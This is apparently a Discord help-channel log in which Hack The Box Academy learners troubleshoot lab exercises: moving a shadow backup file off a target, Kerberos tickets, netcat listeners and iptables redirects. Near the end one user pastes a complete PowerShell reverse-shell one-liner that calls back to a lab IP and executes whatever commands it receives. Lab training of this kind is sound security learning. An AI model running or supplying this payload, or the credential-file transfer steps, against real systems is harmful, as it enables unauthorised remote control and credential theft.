Maybe I'll keep it for tomorrow then. Similiar task is waiting

hi did you solve the passwd opasswd and shadow section

A long time ago

I know I Mean discord, i registered my HTB email but then i got email it got blocked for spam or smething

could you guide me on what im doing wrong

Not gonna guide you

Anyways guysm thank you so much! You saved me good night sleep

Just tell you to file transfer

Have a grate day / morning /evening or night

great

i cant transfer the files or unshadow them

The backup is in a user directory

i got into backups

i got into backups

And how are you trying to transfer?

What errors are you getting

permission denied

goodnight Neu, congrats on the progress

What directory are you in?

will

ls -al

cd .backups

ls

And you are that user, yes?

will@nix01

yes

will@nix01

??
Type pwd

hello guys

/home/will

/home/will

im stuck at Footprinting lab-Hard

when i try to ssh

this is what i get

ssh tom@10.129.202.20 -i id_rsa
Load key "id_rsa": error in libcrypto
tom@10.129.202.20: Permission denied (publickey)

Sounds like the key you have for tom is not correct,try another user?

Is the rsa key formatted correctly?

Does it have the ----BEGIN AND ----END lines

file transfer still not working trying wget

failed: Connection refused.

You don't have to hit reply on all my messages

oh my bad

Especially when it's unrelated to me trying to help you

yup that was missing

thanks my man

understood

just do transfer files module

Hello everyone, I feel enlivened to be part of the HTB Discord community, as a beginner in InfoSec I have high anticipations for what my learning out come would be as a member of this community, especially as I'm choosing to go by the 'playing by the rules' doctrine in mind.

i have done about every transfer method and its not working

i keep trying and it just gets me further into some hole

Python http server worked fine for me

Did you specify the port?

Welcome.
A good first step would be to verify your user. Read and follow #welcome

hey anybody know how to authenticate as a different user into PowerShell?

I think it's runas?

lemme try it

thanks btw

I just used google ¯_(ツ)_/¯

ok., my google skills sucks.....

feel like I am missing something with x64dbg... how does one get the entries to stop bouncing around in the memory map? I've tried pausing with no luck. I can't reasonably read any of the content in there because it just bounces around so much.

Thanks for the tip @acoustic owl , a yellow exclamation mark, gave a notification after I finished reading the rules, to say hello and I decided to go with the flow. I'll be on the verification process now.

That's a discord thing

Not necessarily a setup thing

It "recommends" you to do something

Did you get it working?

no but it shows a 404 error when trying to send it

using python server p 8000

whats above "hacker" in htb?

will@nix01:~$ wget 10.10.15.16:8000/shadow.bak
--2023-10-21 21:44:48-- http://10.10.15.16:8000/shadow.bak
Connecting to 10.10.15.16:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2023-10-21 21:44:48 ERROR 404: File

Oh

Yeah you're just dumb @wary tendon

@fathom pendant I get that now, I have some learning to do that is. The discord UI most especially.

You need to start the http server from the .backups directory

And do wget from your attack machine

Wget is a DOWNLOAD command

cd /home

oops lol

Just do cd or cd ~

That's the quickest way to get to user home

how did you make your way until thay section

Ways to realize this sooner;
what does wget do?
That's it

having troubles listing shares:root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB
So i have a valid ticket for julio but cant list shares smbclient //dc01/C$ -k -c ls -no-pass
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
What am i doing wrong

Ticket is probably expired

so i have to use the other one maybe

Maybe, if you check the info it tells you when it expires

One is old, one is new

if i check info i got an error: klist -k -t krb5cc_647401106_HRJDux
Keytab name: FILE:krb5cc_647401106_HRJDux
klist: Unsupported key table format version number while starting keytab scan

or how do i get info about it?

Read the module

ok

ticket is expired

Listing keytab File Information: klist -k -t Do you mean this command

i cant see julios tickets

That works if it's a keytab, this is a cache file

Iirc shouldn't matter

ah ok

you need to find the path where is the ticket

its in /tmp

yes, and you need to verify if the ticket is valid or not

verifying by trying each ticket of julio?

You don't need the -k

Also, not all the tickets are Julios

I don't think

yeah there are two of him

Yep one is expired one isn't

so i have to guess

or is there a command when it expires

Should be able to use klist

I forget though if the files in tmp have a file extension or not

no they dont

gpt say flag -c

🙂

with klist you will see "Valid starting" "Expires" this will tell you if the ticket is valid or not

Ye, that's default as well if neither -c or -k are specified

ah i see

You can also do -f to see the flags present

https://web.mit.edu/kerberos/www/krb5-latest/doc/user/user_commands/klist.html

Hi guys, sorry If I missed an answer somewhere: Im using htba workstation, Im doing xss module rn and I cant make netcat listen to port 80 as it is occupied (killing the processes was a bad idea, I tried three times), and I cant reroue the traffic to port 8080. Is this technically possible (meaning Im doing something wrong), or such tasks are better be solved on my own vm/system?

already do that, but Words.GetWordList() gave me an error somehow even though I already reference the Assembly.dll

You can have netcat listen on other ports

The pwnbox uses port 80 for the vnc client to reach you to use it

yes, of course, but when I tried to rerout the http traffic to 8080 - well, it was not very fruitful

Wdym "reroute"

If you're having netcat listen on 8080 you're not 'rerouting' anything

And all you'd have to do for revshell stuff is modify the port you use to be 8080

Hey, can anyone here help me solving an easy machine?

I'm new and stuck

#boxes you'll need to verify your htb account following the instructions in #welcome

Oh I see

well, I used "sudo sysctl -w net.ipv4.ip_forward=1" and "sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080"
Im stuck on "Phishing" part of xss module, where you need to send the malicious link to get the credentials

done

Is the eth0 on the target or your pwnbox :)

If it's on either you need to use the tun0

As that's generally the interface that will have the 10.x.x.x subnet

god why am I that dumb

thanks a lot

Common sense helps

How does the interface know to redirect... if nothing touches it

#Module: DACL Attack I
#Skills Assessment
Could use a sanity check here. I'm struggling with one of the tools I believe is needed to complete the last question. Can I DM anyone?

@static roost I can try to help you with my poor skills if you're willing to help me as well 😅

Send the error output

I was able to pull the Wordlist earlier.

An object reference is required for the non-static field, method, or property 'Words.GetWordList()'

You're calling it directly. You need to instantiate an object from that class first using the new keyword.

@quaint hemlock Or you could directly invoke it during instantiation by calling the class constructor ||new Words().GetWordList()||

thx a lot! it works

DM

I need some help with "Skills Assessment - File Upload Attacks" can I DM someone

Hi I took a couple weeks off from HTB Academy after getting stuck on the last lab of Nmap module so I think I wanna review whole module. Is there a walkthrough of entire module in one video? I couldn’t find one.

no, walkthroughs for modules greater than Tier 0 violate the ToS

Ok thanks

What do you recommend at this point? I have completed easy and medium Nmap labs and taken a couple weeks off of HTB and really want to complete the last lab and understand what I learn but I forgot prior knowledge of Nmap.

Re-read the module, re-read your notes and do the labs again

Ok thanks

Just reread whole module from start?

Thats what I would do to refresh my memory, but other people are different

Ok cool

You have to decide, you may be able to skim the module and remember but you have to go further

Ok thanks

I always do this so that if I get stuck on a topic, I look for a YouTube video or a video on Udemy on the topic.
If you have specific questions, then you can always ask here.
But if it's about building up knowledge, as you write, and the module doesn't help you with that, then I suggest the way via YouTube or Udemy.

There are sometimes situations when you don't understand what the author is trying to say. Then you watch a video or read a text by someone else who explains exactly the same thing, but in different words, and suddenly it clicks.
After that, you're sure to understand what the author was trying to say in the module.

@quasi wave @acoustic owl advice is really great

Ok thanks

Try that one with the pwnbox and not your own vm and it might work instantly

which module covers detailed firewall evasion??

Network Enumeration with Nmap
https://academy.hackthebox.com/module/19/section/106

these are for scans. I needed some for reverse shells

There is no module for this

ok thanks I was in the payloads and shells module so I thought of digging a little deeper

Hi I am having trouble with the windows powershell reverse shell

i am getting an error when I run this command powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

I have disabled the firewall

I cannot upload the error code cause mee6 is removing them

this is one very short snippet

... stem.Net.Sockets.TCPClient('10.10.14.158',443); = .GetStream();[byte[ ...```

of the error

To upload images, you need to verify your user. Read and follow #welcome

Which module, section and question is this?

shells and payload

reverse shell section